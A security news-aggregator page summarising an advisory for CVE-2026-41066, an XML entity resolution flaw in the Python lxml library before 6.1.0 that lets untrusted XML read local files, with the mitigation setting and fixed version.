top of page
perceptive_background_267k.jpg

lxml is a library for processing XML and HTML in the Python language. Prior to 6.1.0, using either of the two parsers in the default configuration (with resolveā€¦

Published:

23 April 2026 at 22:00:00

Alert date:

24 April 2026 at 19:03:24

Source:

nvd.nist.gov

Click to open the original link from this advisory

Supply Chain & Dependencies, Web Technologies

lxml, a Python library for processing XML and HTML, contains a vulnerability prior to version 6.1.0 that allows local file access through XML entity resolution. The vulnerability exists in the default parser configuration with resolve_entities=True, enabling untrusted XML input to read local files. Users can mitigate by setting resolve_entities to 'internal' or False. The issue is fixed in lxml version 6.1.0.

Technical details

Mitigation steps:

Affected products:

lxml

Related links:

https://nvd.nist.gov/vuln/detail/CVE-2026-41066
https://bugs.launchpad.net/lxml/+bug/2146291
https://github.com/lxml/lxml/security/advisories/GHSA-vfmq-68hx-4jfw

Related CVE's:

Related threat actors:

IOC's:

This article was created with the assistance of AI technology by Perceptive.

About us

© 2025 by Perceptive Security. All rights reserved.

email: info@perceptivesecurity.com

Disclaimer: Deze website toont informatie afkomstig van externe bronnen. Perceptive aanvaardt geen verantwoordelijkheid voor de inhoud, juistheid of volledigheid van deze informatie.

bottom of page